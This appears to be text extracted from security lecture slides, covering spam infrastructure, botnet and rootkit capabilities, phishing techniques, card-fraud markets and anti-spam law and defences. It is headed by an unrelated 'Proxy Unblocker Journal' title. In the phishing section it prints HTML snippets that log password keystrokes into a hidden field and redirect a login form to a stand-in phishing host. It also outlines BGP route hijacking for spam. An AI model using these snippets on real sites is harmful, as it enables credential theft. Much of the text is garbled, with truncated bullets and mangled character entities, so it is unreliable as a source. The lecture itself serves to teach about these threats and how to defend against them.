Proxy Unblocker Journal

Threat Spyware Trojans Phishing ID theft Spam mechanisms •Open relays –SORBS listed 960,000 open HTTP proxies and 1,200,000 •Pink contracts –Expensive, but avoid ToS –Spamhausestimates that MCI Worldcomalone makes •Gypsy accounts procedure arms_race write spam_filter; acquire spam_filter; tune spam to avoid filter; •Some spamwaredirectly includes SpamAssassintechnology to Buy CDs with harvested addresses •Prices vary depending on the quality •Vacuum-cleaner for ~$50, verified for $ Send mail via spam brokers •Handled via online forums like specialham.com, •$1 buys 1000–5000 credits •$1000 buys 10,000 compromised PCs Broker handles spam distribution via open proxies, relays, compromised PCs, … •Sending is usually done from the client’s PC using broker- •Sources are obscured using spread-spectrum/frequency- hopping style techniques One experiment in blocking IP addresses originating worm/virus attacks ended up blocking Spammers can do whatever they want They simply don’t want to know —China Telecom doesn’t care because they’re government-owned, and there is no pressure coming from the government —Steve Linford, Spamhaus Use BGP route injection/AS hijacking to steal an IP block •Break into a poorly-secured router –NANOG 28 (June’03) ISP security BOF: 5,400 •Send a BGP route update announcing that your router is now responsible for some currently-unused block of IP addresses –In 5-10 minutes the entire Internet will know –This is all the time you need •Spam like crazy from each IP address in the block until you get Spammers routinely break into legitimate user’s PCs to “I don’t bother securing my [games] PC, because I doubt spammers are interested in my savegames” All Granny’s going to notice is that her computer is running slowly while, unbeknownst to her, it’s blasting out spam or assisting in a denial-of-service attack —Andrew Jaquith, Yankee Group Research Inc. server Controller Controller Source code is freely available •Well-written C++ implementation •Cross-platform •Modular design •Easy to add new capabilities Exists in many variants •Agobot, Phatbot, Forbot, Xtrmbot, … •Originally used IRC •Some variants use P2P control, e.g. WASTE, Example: Agobot(ctd) General capabilities Example: Agobot(ctd) Typical Agobotcommands Harvest email addresses Example: Agobot(ctd) Many additional commands are available •Macro forms of spam commands to perform the above with a •Display spoofed pages via browser help objects (BHO’s) •Web page redirection •Spywarepropagation •Steal CD keys/registration codes for commercial software from –Includes a database of registry locations for common •Search the hard drive for sensitive files, e.g. *.xls, *finance* Same pattern as Agobot, but oriented more towards spying/system manipulation Example: HaxdoorIdentity-theft Trojan Advanced anti-removal and rootkitcapabilities •Hides itself by hooking the System Service Dispatch Table •Auto-loads via WinLogon Example: HaxdoorIdentity-theft Trojan (ctd) Spywarecapabilities •Captures all information entered into MSIE –Recognises financial-site-related keywords on web pages (“bank”, “banq”, “trade”, “merchant”, …) •Steals cached credentials (RAS, POP, IMAP, …) •Feeds info to servers running on compromised hosts One server held 285MB of stolen data from 9 days’ •6.6 million entries, 39,000 distinct victim IP addresses –Probably much higher due to NAT’ing SpamwareFunctions Email security firm MessageLabsreports that of the spam it blocks is from infected PCs •Much of the spam comes from ADSL/cable modem IP pools •Distributed Server Boycott list reports 350,000 compromised SpamwareFunctions (ctd) Worms act as special-purpose spam relays (e.g. Backdoor.Hogle, MyDoom.*) •MyDoominfected ca. 1,000,000 PCs (F-Secure) •Infected PCs (“fresh proxies”) are traded in spammer forums •Spamwaresends either direct from end-user PCs or routed via –Spam comes from legitimate users or legitimate ISPs Worms act as reverse HTTP proxies •Provide a distributed fault-tolerant “web site” for spammers •Backdoor.Migmafchanged the “site” every 10 minutes –c.f. email spam frequency-hopping Disable anti-virus/firewall software (ProcKill, Klez, Bagle- •At one point it was possible to scan for viruses via the standardisedcode that they used to disable MSAV Bypass firewall software •Walk the NDIS.SYS memory image or data structures and patch yourself in beneath the firewall hooks –Page in your own NDIS.SYS image from disk to avoid •Many, many variations used by different rootkits, e.g. Modify anti-virus database files to remove detection of the malware (IDEA, AntiAVP) Re-enable unsafe defaults in software, e.g. MS Office (Listi/Kallisti) Infect through CRC32-checksummed files (HybrisF) •CRC32 isn’t a cryptographic checksum mechanism •Can modify the file without affecting its CRC32 value Install rogue CA root certificates (Marketscore) •Because of the browser certificate trust model, Marketscore Disable user rights verification by patching the kernel •Two-byte patch to Engage users in IM chat sessions inviting them to download malware (IM.Myspace04.AIM) •The worm will tell users that it’s not malware if asked •The typical AOL “lold00d check this out” is hardly a Turing- test level challenge Steal CD keys/registration codes for commercial software Add registry entries to make an ActiveX control appear “safe” and digitally signed (Grew) Pop up messages requesting payment of money and may disable your computer if you don’t pay up (WGA) Prevent anti-virus/malware removal programs from •Remove registry keys •Block apps from starting –Register kernel-level load image notification callback via Use NT native API to create registry entry names that the Win32 API can’t process Email address harvesting (several) DDoSon spam-blockers (numerous) Run a SOCKS proxy for spammers (BID 9182 MSIE hole) Run port redirectors to mask the true source of traffic Spammers can do virtually anything to a victim’s PC Spamwarewith User Consent Legitimate programs install spyware/trojans/spamware •Users permit this via the EULA agreement •Example: Kazaa –182 screen-page licence –SugarCRMlicense is approx.700 screen pages –Additional licences included by reference –Further documents incorporated by reference –Many portions are malformatted, making them difficult to –Disables standard Windows facilities like cut & paste to prevent it from being read more easily in a text editor •DirectRevenue(44 screen-page licence) gives itself the right to attack and destroy other spywareon the machine •Use OLE automation to approve the EULA automatically Monoculture paper: Computing power is moving to the (insecure) web periphery •Centralised vulnerable servers Publicity virus: Written by bored script kiddies •Poorly tested, often barely works Spam/phishing virus: Written by paid professional •Well-tested, can be quite sophisticated –The Babylonia virus used plug-in virus modules (VMODs) –The Hybrisworm uses digitally-signed encrypted updates propagated via web servers and newsgroups The [Scobtrojan] attack demonstrated the same skills required to design an entire software application Some malware will send back a diagnostic memory dump (àla Windows Error Reporting) if it fails to run on a particular machine configuration The gang has been very active and worked with care on each aspect of the final product. The developers constantly improved the code with […] code optimisation and memory checks to avoid blue-screen errors Zero-days are sold online There are dozens of these sites with hackers offering zero-day code for sale all the time. They even have a mechanism to Kernel-mode rootkitscan be bought from third-party •Outsourcing the anti-detection code allows malware authors to concentrate on the payload Sony even installs a (badly-written) rootkitas part of its •Rootkitwas exploited by trojans/viruses to hide their presence •Trying to remove it could violate the DMCA (or similar laws Most people don’t even know what a rootkitis, so why should —Thomas Hesse, president of Sony BMG’s global •Around half a million computers worldwide were infected Those are amazing infection numbers, making this one of the Available as Bronze/Silver/Golden/Brilliant Hacker •€150 (Bronze)/240 (Silver)/450 (Gold)/580 (Brilliant) layered •Commercial version of Hacker Defender Example: Hacker Defender rootkit(ctd) Anti-virus vendors notice users performing online scans of small variations on a theme The professionalism of these rootkitsis coming to another —Allen Schimel, StillSecure Then organised crime moved in… •Dutch Schultz took over from existing operators •They weren’t career criminals and were intimidated by explicit Dutch hired mathematician Otto “AbaDaba” Berman to fix Once organised crime got involved, everything changed •A trivial problem/nuisance became a major criminal enterprise The modern spam industry now is spread across the globe and has become infested by technically organised programmers from Russia and Eastern Europe, often in league with local organised crime syndicates —Colin Galloway, Asia Times Most of the big outbreaks are professional operations. They are done in an organised manner from start to finish —MikkoHypponen, F-Secure The bad guys are winning. They’re stealing more money, swiping more identities, wrecking more corporate computers, Phishing: A broadly launched social engineering attack in which an electronic identity is misrepresented in an attempt to trick individuals into revealing personal credentials that can be used fraudulently against them —Financial Services Technology Consortium Have gone from amateurish to very sophisticated, professionally-run operations •Phishing toolkits allow criminals to select corporate logos, web –eBay’s own fraud investigators were fooled by one phishing email, and endorsed it as legitimate •Perfect copies of the original site •Links lead back to the real site Convince users to go to the fake site •Promotions: $1,000 top-up for your account, reduce your home mortgage rate, win a car, … –Mirror existing promotional efforts by banks •Update/verify your account information –May ’04: Wachovia merges with First Union (large US –Sends email to customers with a link for updating account –Wachovia’s phones started ringing off the hook… –December 2005, yahoo sends mail to Yahoo Mail users personal information and a credit card number… •View your account balance –Wells Fargo used to regularly send out emails with embedded links that were indistinguishable from phishing –Chase still does this Here is official mail from a credit card company, actively training its users to become future victims of phishing •Visit our new, more secure web site –Again, this mirrors the practices of real banks –Chase sends out emails with embedded links exhorting customers to sign up for phishing-protection plans (!!) –To compound the sin, they use random third-party email –Chase will also honourpre-approved credit card applications that have been torn into little pieces, taped back Financial institutions are training their users to accept phishing email Westpac bank may use your email address to advise you of To validate your personal Westpaconline banking account follow the link below: https://westpac.com.au/validate.asphttp:// Bank emails are indistinguishable from phishing emails Customers should understand that Citibank will never send e- mails to customers to verify personal and/or account information […] It is important you disregard and report e-mails which […] request any customer information —including your ATM PIN or account details —Citibank Australia and […] to identify and authenticate yourself, enter (a) your card number (b) your ATM PIN (c) your account —Citibank Australiaemail, November 2006 It had all the classic signs. It was an e-mail asking the customer to go to a Web site and enter their ATM or credit card number, their ATM PIN and their account number. It then asked them to enter some answers to security questions such as their mother’s maiden name and create a username and —BronwyneEdwards, SMS Management & Technology The bank couldn’t see a problem Are you guys on crack? —Paraphrased journalist inquiry to Citibank These are all online banking customers and are used to receiving e-mails from us. I don’t believe we have contradicted [our security policy] —Citibank Australiaspokesperson Financial institutions are training their users to ignore security indicators A profusion of domain names serve to confuse users •citibank.com = Citibank •citibank-verify.4t.com –No problem to certificate for •accountonline.com –Citibank uses six more domain names Many other organisationsdo this •TD Waterhouse •United Airlines Other Citibank-like domains citibank-america.com, citibank-credicard.com, citibank-credit-card.com, citibank-credit-cards.com, citibank-account-updating.com, citibank-creditcard.com, citibank-loans.com, citibank-login.com, citibank-online-security.com, citibank-secure.com, citibank-site.com, citibank-sucks.com, citibank-update.com, citibank-updateinfo.com, citibank-updating.com, citibankaccount.com, citibankaccountonline.com, citibankaccounts.com, citibankaccountsonline.com, Some are legitimate, some aren’t •citibank-account-updating.com is supposedly owned by Ms.EvelynMusa, •Like virtually all similar cases, this person is an innocent victim of identity fraud –(Why would any rational criminal commit a crime in their own name when they can trivially use someone else’s?) This is an endemic problem for identity-based accountability systems like domain registration and certificates Example: HanscomFederal Credit Union •Home of HanscomAir Force Base •Uses domains www.hfcu.org, locator.hfcu.org, ask.hfcu.org, F-Secure survey of registered domains, November 2006 SecuritySpacesecure server survey shows that 58% of SSL server certificates are invalid Even with certificates used, most users can’t tell right from •Only 50% of experienced computer users identified Verisign as •No users verified Saunalahdenas a trusted CA (Saunalahdenis –Web site is in Finnish, you can’t tell what it is even if you •81% of users identified VeriSlimas a trusted CA (VeriSlim [continued] [continues] •84% identified Visa as a trusted CA (Visa is a credit card •22% of –An informal survey of non-experienced users indicates that •Only 24% of users could tell a spoofed HTTP amazon.com Phishers have started using self-signed certificates and similar techniques to fool users (“secured phishing”) In self-signing, you become your own CA […] most people don’t know that self-signed certificates exist —Susan Larson, Surfcontrol •Security firm Netcraftrecorded 450 cases of secured phishing in 2005, the first year that records were kept –Self-signed certs –Certsfor soundalikedomains –Cross-site scripting to insert content into banking web sites –Frame injection to " •Many bank sites (e.g. MasterCard, Barclays) are insecurely coded and allow these types of attack Example secured phishing site: visa-secure.com •Uses phishing email from visa.com to send users to the site •The real Visa uses similar naming, e.g. •Site uses an SSL certificate to “authenticate” itself We use advanced SSL encryption technology to ensure confidential information cannot be viewed, intercepted, or —visa-secure.com phishing site •Site is (was) hosted in Taiwan Consumers underestimate the threat •Sept/Oct 2004 AOL survey examined 329 home computers •70% of users believed they were safe •85% had antivirus software –67% of it was out of date A large proportion of [virus-infected] systems had some form of Norton AV installed, and EVERY SINGLE ONE had a virus subscription which had lapsed. Entirely useless in protecting those —Slashdot •AusCERTstudy in 2006 found that the most popular anti-virus I had a class full of students this semester […] the second assignment was to write a virus that would pass the anti-virus software, and all of them did by the following week —Matt Blaze, 2004 Security Protocols workshop One customer had over 3000 instances of some 30 or 40 viruses on her computer, some of which required some People expect Hollywood-style effects from malware •Exploding panels •Sparks flying from the case •Crashing alien spacecraft Modern malware is designed to be as undetectable as •No visible effect I ran this Anna Kournikovathing and nothing happened. Why —Anti-virus vendor support call 80% of surveyed users were infected with adwareand Most consumers believe that the threat is less than it is and Geek-speak confuses users •AOL UK survey found that 84% of users had no idea what •39% knew what a trojanwas (in the US it’s a condom brand) •Only 25% knew what spywarewas –10% of those thought it was for keeping an eye on your Attacker controls the DNS •Server compromise –10% of DNS servers scanned in late 2005 were vulnerable –Used in one attack to redirect visitors to to spywaresites •Bribing/blackmailing ISPs •Virus changes the victim’s DNS server entries (“pharming”) –Can be used to disable security updates –(Fake) windowsupdate.com: Your system is up to date and •Script in phishing email rewrites the victim’s –As for direct DNS compromise •Many DNS providers ignore TTL’s –Invalid DNS entries can take weeks to correct Trojans control the victim’s PC •Sniff keystrokes, mouse clicks, images of graphical “virtual •Render copies of genuine bank pages from the browser cache Trojan installs itself as a browser help object (BHO) •Watches for access to a who’s who of banking sites around the Use typo-squatting to install malware •googkle.com infects visitors with trojans, backdoors, and •Popups redirect to third-party sites loaded with downloader •Use assorted exploits to download more tools containing •Just one of these downloaded exploit packages contains two backdoors, two trojandroppers, a proxy trojan, a spyware trojan, and a further trojandownloader •Another trojandropper infects the Windows system folder and file to prevent access to anti-virus sites •Another generates a fake virus alert and directs the user to Fake out standard Windows dialog boxes •“Your computer clock may be wrong, click here” •“Your computers is vulnerable to attack, click here” (!!) Example: Gliedertrojan Phase 1, multiple fast-deploying variants sneak past AV software before virus signatures can be propagated •Disable Windows XP Firewall and Security Center Phase 2, connects to a list of URLs to download Fantibag •Disables anti-virus software and other protection mechanisms •Blocks access to anti-virus vendors •Blocks access to Windows Update Phase 3, Mitgliedermalware contains the actual payload Example: Hybrisworm Plug-in modules were encrypted with XTEA and digitally signed with a 1024-bit RSA key •Modules were obtained from web sites or newsgroups Modules (‘muazzins’) included •Windows help file infector •Polymorphic Windows executable infector –Could also infect executables ‘through’ a •DOS .EXE infector •RAR/ZIP/ARJ infector •Word, Excel infectors •SubSevenbackdoor dropper Example: Hybrisworm (ctd) Spyware via the affiliate model •Pay others to infect users with spyware/adware/trojans •iframedollars.biz pays webmasters 6 cents for each •Their exploit drops at least 9 pieces of malware, including backdoors, trojans, spyware, and adware Piggbackmalware on legitimate software •CoolWebSearchco-installs a mail zombie and a keystroke •Gathers credit card numbers, social security numbers, Use a web site’s ability to control the browser to spoof the •Infinite spoofing variants possible –Intercept the –Move the window the mouse is over (generating the “drag”) –Permit the click to continue to the –Result is a drag-and-drop of anything on the local system to •Overlay a minimal data-entry window over the real site’s login –This trick was used to attack Citibank •Use Javascript keyboard monitoring to grab plaintext input type=“hidden” name=“phishing” value=“”&#xinpu;&#xt ty;&#x-21p;=hi;ෞ-;!n ;&#xname;&#x=-21;&#xphis;&#xhing;&#x-21 ;&#xvalu;=-2;က input type=“password” name=“password” onKeyPress=“this.form.phishing.value+= String.fromCharCode(event.keyCode);” •Use domain rewriting to send a login elsewhere form action=“http://www.bankofameriorm;&#x act;&#x-21i;&#xon=h;&#xttp-;!:/;&#x/www;&#x.ba-;!nk;&#xofam;ri-;⇊&#x.com;ca.com” input type=“password” name=“passwor&#xinpu;&#xt ty;&#x-21p;=pa;&#xssw-;!or; na;&#xme-2;
=pa;&#xsswo;&#xr-21;퀀d” input type=“submit” value=“submit” onClick=‘this.form.action= “http://www.phishing.com”’ •Infinite variants possible –Create a mock password field that echoes ‘*’s and stashes –Create a mock password field as above that submits each keystroke as it’s entered to a phishing site Mozilla via its XUL UI is probably no more secure than IE Core Wars in the UI •Phishers and developers battling it out in the user interface Example: Grams egoldsiphoner Invades the victim’s PC via the usual attack vectors Uses OLE automation to spoof the user’s actions •Uses the interface •Checks for accesses to •After user has logged on, uses to copy the account balance •Uses Example: Grams egoldsiphoner(ctd) Attacker uses the computing infrastructure to fool the victim into thinking they’re doing A when they’re doing •Infrastructure is working exactly as •No overt compromise is necessary (although it can help) •c.f. vase vs. two faces trompel’oeil Give a man a fish and he eats for a day Anti-virus firm MailFrontierreports that •28% of test subjects fell for phishing email •20% regarded genuine email confirming a purchase as fake Many users are defaulting to not trusting any message that seems to be from one of the institutions they do business with. This inability to communicate with customers is a denial of service attack unlike any we’ve ever seen before —Paul Judge, CTO, Ciphertrust Users are overwhelmed with passwords •InfoSecurityEurope survey found that office workers averaged •Were required to change them daily, monthly, or quarterly –No study has ever shown any value in forced password –Forced frequent password changes = equivalent of a dog turning around three times before lying down –Extensive (anecdotal) evidence shows that it harms security •People wrote passwords on public whiteboards (“I think they rub it off before the cleaners arrive”), use sports teams + date, Even blatant social engineering will work •71% of users revealed their passwords (directly or indirectly) in exchange for a chocolate easteregg + social engineering •Example: Stated that password = favourite sports team + date, then later mentioned the sports team “Live phishing” experiment in Central Park, NY •Give people a t-shirt for filling out a survey •70% divulged their MMN •90% revealed their place and date of birth •Generate a response for the user to transmit to the server •Provides mutual authentication of both parties –No user credentials are sent until the server has been •Even RSA Data Security, the creators of Verisign, are now The proper course is for the computer industry to create a The most elegant solution has the token read the server information from the computer screen •Hold the token up to the indicated area on the monitor Watch for a flood of referrals to your site from an unknown •Doesn’t work when virtual servers are being used Don’t send customers mail with links to click on •“Visit our home page and follow the XYZ link” •This will drive your sales guys nuts… Don’t allow users to open accounts or change their address •Require paper mail communication / person-to-person Phishing Defences(ctd) Don’t use popups to obtain data from users •Standard legit-site spoofing technique used by phishers •MasterCard SecureCodeuses a popup to obtain extra PIN data Use a two-phase login •First page (HTTP) asks for the user’s name •Second page (HTTPS) asks for the user’s password –Decorate the second, password page with user-specific –Train users to be suspicious if this information isn’t •Almost all non-US banks do this •The majority of US banks Phishing Defences(ctd) Perform mutual authentication of both parties •Challenge-response mechanism authenticates users Phishing Defences(ctd) Use a PwdHash-style mechanism to create per-site unique •Hashes a user password, site ID, and nonce •Ensures that –Each site has a different (hashed) password –No site ever knows the user’s actual password Maintain a client-side history of sites accessed via SSL •Warn the user if they’re accessing a new domain Phishing Defences(ctd) Warn users when certificates from rarely-used CAs are •Browsers, mailers contain over 100 built-in CAs, many of Phishing Defences(ctd) Require out-of-band verification if floor limits for unusual transactions are exceeded •“Ah, our customer must be travelling in Nigeria and wanting to transfer all his money to a bank in Anguillaat 3 o’clock in the •(If you’re travelling to an obscure country, try withdrawing money from there and see if your bank checks up on you) Require customers to explicitly enable remote access as they do for cellphoneroaming •Just a simple measure like a call to or from an account holder’s number will defeat remote attackers Phishing Defences(ctd) Don’t tie authorisationto obvious identifiers like SSNs Balance is strongly tilted in favour of the bad guys In a recent survey, 31% of online shoppers said they were buying less than before because of security issues —LA Times 6% of consumers (12 million) have changed banks and 18% (39 million) have stopped shopping online due to concerns that their personal information will be stolen [...] nearly halfof consumers would be willing to switch their accounts to financial institutions they perceived as having stronger theft Even if no actual fraud occurs, consumer suspicion of legitimate online interactions […] far outweigh the direct costs [of phishing] to financial institutions —Financial Services Technology Consortium The economics of online fraud are so much in favour of the criminals that, at least for now, a continued increase in phishing activity is all but certain —Brian Krebs, Washington Post •CSO Magazine has a 19-page article “How a Bookmaker and a Whiz Kid Took On an Extortionist —and Won” on the 9- month, $1M battle it took to bring down a single online You can call me spam queen, I don’t really care. As long as I’m not breaking any laws, you don’t have to love me or like What is spam? •“I’ll know it when I see it” Defining spam also (implicitly) defines non-spam •Spammers will alter spam to qualify as non-spam •Legislation will (inadvertently) The same problem was encountered with spyware definition attempts •Consistent definitions allowed spywarevendors to work within US corporatesare experts at end-runs around opt-in •“We won’t sell your details to third parties –Rent or exchange them •Medical insurers: “Sign this unlimited waiver or go elsewhere for medical care” Spammer-endorsed spam legislation •You know this one’s going to be good… •Spam volume Rushed through Congress in a hurry to pre-empt California’s strict opt-in law before it took effect on 1 All of the law’s provisions are trivially circumvented Use non-promotional content to classify your spam as non- BUY V1AGRA NOW! Provide (invalid) unsubscribe link •Spammers don’t care about unsubscribe mechanisms, you’re Many variations of unsubscribe trickery exist Register the domain name 6 hours after sending the spam and shut it down after another 12 hours •Spam is sent late at night, domain goes live in morning •Minimisesexposure, doesn’t use a spoofed address •Wreaks havoc on DNS servers as MTAscontinue to look up At best the CAN-SPAM features are completely ineffective •At worst they aid the spammers (unsubscribe trickery) Compliance with CAN-SPAM •January 2004 •April 2004 •June 2004 •August 2004 In 2008, after reviewing comments submitted three years earlier, the FTC revised CAN-SPAM to make it even more ineffective… •Makes opt-out almost impossible for consumers Also known as the I-CAN-SPAM Act •First prosecution, of “Phoenix Avatar”, didn’t occur until a full year after the act was passed •Spammer was given a suspended sentence and barred from •First conviction wasn’t until 2007, –Offender was also convicted of wire fraud, witness National legislation pre-empts stricter state legislation •Its main effect is to legitimisespam designed to exploit it –Florida Attorney General used it to spam Floridians during –Fourth Circuit Court of Appeals ruled that it negated state •High-profile initial prosecutions will encourage pseudo- compliance to avoid further prosecutions –Like antibiotics creating super-bugs –Actually it isn’t even encouraging pseudo-compliance… CAN-SPAM is a toothless tiger that nullifies most aspects of every state’s anti-spam legislation and leaves spam victims without meaningful legal recourse —Dan Appelman, Heller Ehrman, White & McAuliffe, LLC Example of CAN-SPAM in action •AOL employee Jason Smatherssteals 92 million email •Theft was carried out using another AOL employee’s access •Smatherssells the addresses to spammers for $100,000 •Pleads guilty to this in court –The judge had had to close his own AOL account because •None of this was considered a crime under CAN-SPAM I’m not prepared to go ahead […] I need to be satisfied that a crime has been created [sic] —Judge Alvin Hellerstein, Manhattenfederal court Attempts to do an end-run around I-CAN-SPAM by prosecuting offenders using other legislation •Sotelov. DirectRevenueclaimed trespass to chattels by a •Court ruled that “interference” (rather than explicit damage) Spyware interfered with and damaged [the plaintiff’s] personal UK Spam Legislation(ctd) In the UK, phishing sites are protected by the Computer •Daniel Cuthbert, security consultant at ABN Amro, makes a •Site looks somewhat suspicious, so he checks a few other pages on the site to make sure that it’s not a phishing site •This triggers an IDS at British Telecom UK Spam Legislation(ctd) •Cuthbert is prosecuted, convicted, fined, and loses his job We welcome today’s verdict in a case which fully tested the computer crime legislation and hope it sends a reassuring message to the general public UK Spam Legislation(ctd) In further news, the UK government is proud of the fact Each prosecution is reported in the media •They’re so rare that they’re newsworthy Australia’s first prosecution took two years after the law •Like the US and UK, Australia’s anti-spam law is very weak, Everyone would have to upgrade to modern email clients Requires a global secure access control mechanism Closed communities •Refuse to accept mail from someone you don’t know You don’t exist, go away •Need to predict in advance everyone who’ll ever send mail to –Change of address –Using someone else’s PC to send mail –Sales inquiry Prevents use of (outright) forged addresses •Various proposals exist –Designated Mailers Protocol (DMP) –Reverse Mail Exchanger (RMX) –Sender Permitted From/Sender Policy Framework (SPF) Attempts to implement this in practice have had limited Technical problems •Other proposals used path authentication (server to server) –Handled by (usually) well-managed servers •SPF used message authentication (end-user to end-user) We were both wrong… •Spammers are adopting SPF faster than legitimate users –More spam (12%) passes SPF checks than legitimate email •It failed in negative time! –SpamAssassinweights messages from SPF hosts with a - 0.001 score because of its negligible value in controlling The work [is] an excellent example of how to not design security Spam is effective because it’s free •To make it less effective, make it non-free •Sender: I have some mail for you •Receiver: Please submit the solution to the following problem –Receiver computes in O( 1 ) time –Sender computes in O( 1000 ) time •Receiver-controlled rate limiting •Sender pays in CPU time to send mail Only works if everyone does it •The fax machine effect •Need to convince sendmail, Microsoft, qmail, Postfix to –Others would be forced to follow Who manages the billing? •15 years of work on micropaymentshaven’t produced any (practically) useful results Breaks mailing lists •Use white-lists for trusted partners •Drop unpaid mail into quarantine Discriminates against low-powered clients •A few seconds on a 3GHz P4 is an hour on a PalmPilot Proof of resource consumption just wastes resources •Cycles should be applied usefully –Bread Pudding Protocol is a proposal to do this hate paying for email •Email is effective because it’s free •There’s a reason why everyone uses email and not Telex, EDI, In practice it doesn’t work Limits the damage caused by compromised hosts •Limit outgoing connections to 0.5–1 connection per second –Code Red ran at 200 cps –SQL Slammer peaked at 30,000(!!) pps(using UDP) •Suspend programs that make too many connections at too high Variations on throttling mechanisms •Rate of failed connections (catches random address probing) •Rate of first-contact connections (doesn’t penalise repeated •Connections not preceded by DNS lookups (catches probing) •Electronic equivalent of a firebreak: You’ll never be able to prevent the problem, but you can at least limit the damage •MSIE was 5 years behind everyone else in supporting ad •Adding virus throttling would be an admission that Windows is Requires special-case handling for P2P software •Most P2P apps rely on opening connections to many peers at •Many peers are offline/unreachable Termination of spammers pour discourager les autreshas been proposed at various times •Russia’s most notorious spammer, VardanKushnir, was beaten to death with a heavy object in his apartment •Some of the news headlines “Ignoble Death Becomes Russia’s Top Spammer” VoIPSpam VoIPSpam (ctd) Use humans to make the calls •Cheap labour in India, Pakistan, … •Cheap phonecallsvia VoIP •Companies can’t block these calls without jeopardising their –Common carrier = allow nondiscriminatoryuse in exchange for liability protection for misuse VoIPSpam (ctd) VoIPmail boxes dutifully record every message that they •Humans will hang up within seconds •VoIPproviders will need to massively expand storage to store VoIPvoicemail spam Instant Messaging spam (spim) SMS/text messaging spam Current situation can only be addressed via legislation •Neither users nor vendors have any natural incentive to fix -10 yrs -5 yrs legislation Proxy spam Spam comes from legitimate (if unwitting) users Spammers operate from jurisdictions (logical and/or physical) where prosecution is unlikely/impossible Going after the spammers directly is unlikely to be effective Prosecution requires evidence, plaintiff, defendant •Plaintiff = everyone with an email address •Defendant = unknown Solution to the threat is to address inadvertent spamming via legitimate users (open proxies, compromised hosts, Most spam is sent via unauthorisedchannels •The dress-code-for-bank-robbers legislative approach will Pass legislation to close the unauthorised channels Today’s dumb-terminal equivalent is more capable than the departmental server of 10 years ago •90 % of them are used as little more than dumb terminals Example: “Blaster Revisited”, ACM Queue magazine •The task: Electricity-bill payment terminal –Enter name, address, amount, hit Enter Windows OK (Bill Cheswick) •Browses the web •Sends/reads email •Arranges photos and music •Nothing else Can’t use Outlook or MSIE (1 Unlikely to pass in the US due to software industry •Would require an Enron-style debacle to pass This is a social problem that can’t be fixed using •Technical solutions are a band-aid on a sucking chest wound No solution in sight •Just have to treat it like traffic jams, it’s just a cost of the ISPs should close port 25 (and 587, and others) by default Convince consumers that it’s safe to buy online •SSL protects credit cards in transit •If you see the padlock, you’re safe Security theatre •Vendors put padlock GIFson their web sites to provide extra reassurance –Of the 50 largest US banks, 49 use padlock pictures to •Protects (in theory) against a man-in-the-middle attack –Zero recorded instances in 10 years of online credit card use •No protection for cards once they’re at the merchant’s server Crooks obtain user credit card/banking information through various means… Breaking into poorly-secured servers •Large-scale, tens to hundreds of thousands of cards collected Phishing/social engineering •Medium-scale, more effort required but can collect more Dishonest restaurant/bank/hotel employees •Very small-scale, but provides the most information •A good job for credit-card harvesting is pizza delivery –Obtain card numbers from phone orders –Look out for empty houses to use as dead-drops when Online shell auctions (online variant of dishonest •Various massive breaches ( •This has been going on for years, but only became public after California passed legislation requiring that victims be notified –Since most US companies do business with California, it Bribing employees of overseas call centres •UK Evening Standard reports that organised crime gangs are offering a year’s wages to call centre staff for account access Offshoringis an accident waiting to happen —BBC News Dishonest call-centre employees •US bank call centre employees in Pune, India, siphoned Rs The money was used to splurge on luxuries like cars and —Times of India •The UK Sun newspaper bought 1,000 bank accounts from a Delhi call centre for £4.25 each –Account information Stolen personal information is so easily available that the best protection is that crooks simply can’t use it all •Number of identities stolen in an 18-month period from Feb’05 —Jun’06: 89 (Privacy Rights Clearinghouse) •The smaller the breach, the greater the chance of the information being misused by crooks Fraudsters […] can use roughly 100 to 250 [stolen identities] in Social security numbers (SSNs) and other information can readily be bought online Owners sell or rent their SSNs •Illegal immigrants need a legal identity to work in the US –1986 Immigration Reform and Control Act created a •Group B lends or rents their SSN to Group A –ID belongs to a legitimate person, so there are no –Homeland Security is so busy looking for terrorists behind every bush that they’ve almost stopped investigating illegal immigrants (98% drop since 9/11) No national stolen SSN database exists (!!) Prices for a CD or DVD of stolen data in Gorbushka Some of this information is also available in places like the •$110 to •Other sites sell similar information for $90-150 –Reputable firms work around problems in obtaining the information by farming it out to contractors and not asking Information security by carriers to protect customer records is practically nonexistent and is routinely defeated —Robert Douglas, privacy consultant •To see how dangerous this could get, a bloggertried buying the call records for Supreme Allied Commander of NATO –Cost $89.95 from –Required only the cellphonenumber and a credit card •This seems to be explicitly permitted by US law A provider […] may divulge a record or other information pertaining to a subscriber to or customer of such service […] to any person other than a governmental entity —18 USC 2702 Prices are openly published or subject to private •“CVV for $1, CVV with SSN for $10, bank account $50, …” Card checks are performed via IRC bots •!chkcardnoexpiry •!cclimitcardno •!cvv2 cardnoexpiry –CVV is the 3-4 digit crypto checksum on the back of the –Required as an extra check by some merchants •This is more sophisticated than many merchants! User identities are hidden via IRC proxies (bouncers) on Cashiers cash out the contents of the drops •Take 50% of the funds to move the money out via services like •Many, many ways to cash out the funds. Example: Find a business with $10K of debt, agree to pay them $20K if they Everything can be outsourced •Scammer buys hosts for a phishing scam •Buys spam to lure the punters •Buys drops to send the money to •Pays a cashier to cash out the accounts You wonder why anyone still bothers burgling houses when this is so much easier… The money seems to be in being the middleman Less obvious: Use online auctions for money laundering •Advertise new $1000 digital camera on ebayfor $800 Buyer countermeasures •Watch out for auctions asking for cash-equivalents (money •Ask for the product’s serial number before buying (requires a middleman to hold the payment) Merchant countermeasures •Require shipping address on file with the issuing bank Credit cards confuse identification and authorisation •Credit card must be both public (identification) and private Credentials are easily duplicated •Real owner of A is never notified of the existence of B •Bad guy now “owns” B Properly-designed mechanisms separate identification and authorisationcredentials •Username (public) and password (private) •London Underground ID card (heavyweight identification) and The PIN entry device shall be a secure cryptographic device […] during PIN entry at a terminal, protection becomes the responsibility of the card acceptor —AS 2805.3:2000, Electronic Funds Transfer — Management and Security Windows 95, Windows 98, Windows ME, or Windows CE […] cannot be used in secure environments —“Writing Secure Code”, Microsoft Corp, 2004 No account holder liability in respect of any […] forged, faulty, and then using them for fraudulent means constitutes “forgery” •The customer would not be liable Merchant Acquirer Gateway Purchase order purchase instruction Authorisation AuthReq •Some attempt to mitigate this by splitting the costs Merchants will only ship to the CC billing address •Sledgehammer approach inconveniences many customers Banks aren’t too worried, merchants carry the cost •Consumers pay via increased prices Each step back buys 1-2 years •Ship-to-billing-address is the last line of defence •One-time password per transaction –Send new TANswhen the old list is about to expire Used by European banks for online banking •Marginal cost is close to zero –TANsare sent out with bank statements •Remarkably effective against online credit card theft/fraud –The one thing you can’t do online is intercept paper mail •Requires participation by banks –Non-European banks haven’t got past username + password –Currently the pain isn’t sufficient to motivate 